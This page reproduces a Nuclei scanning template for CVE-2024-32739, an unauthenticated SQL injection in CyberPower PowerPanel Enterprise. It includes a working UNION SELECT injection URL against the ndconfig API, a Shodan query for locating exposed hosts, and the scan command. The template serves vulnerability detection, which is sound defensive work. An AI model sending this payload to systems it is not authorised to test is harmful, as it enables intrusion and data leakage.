CyberPower < v2.8.3 - SQL Injection
ID: CVE-2024-32739
Severity: high
Author: DhiyaneshDk
Tags: cve,cve2024,cyberpower,sqli
Description
Section titled “Description”A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
YAML Source
Section titled “YAML Source”id: CVE-2024-32739
info: name: CyberPower < v2.8.3 - SQL Injection author: DhiyaneshDk severity: high description: | A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. impact: | An unauthenticated remote attacker can leak sensitive information via the "query_ptask_verbose" function within MCUDBHelper. reference: - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote - https://www.tenable.com/security/research/tra-2024-14 - https://nvd.nist.gov/vuln/detail/CVE-2024-32739 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-32739 epss-score: 0.00043 epss-percentile: 0.09691 metadata: verified: true max-request: 1 shodan-query: html:"<title>PDNU</title>" tags: cve,cve2024,cyberpower,sqli
http: - method: GET path: - "{{BaseURL}}/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"
matchers-condition: and matchers: - type: word part: body words: - ':"finished"' - '"results":' condition: and
- type: word part: content_type words: - 'application/json'
- type: status status: - 200
extractors: - type: regex group: 1 regex: - '"code":"([0-9.]+)"'# digest: 4a0a00473045022100d95a85b09658ed278019307aadf6ba0d6f10ab5fe27dc09336ed860162d2282502202795b7335fba8973e163b42fa3df0468a50b930981d07ade7e93b850ff640265:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-32739.yaml"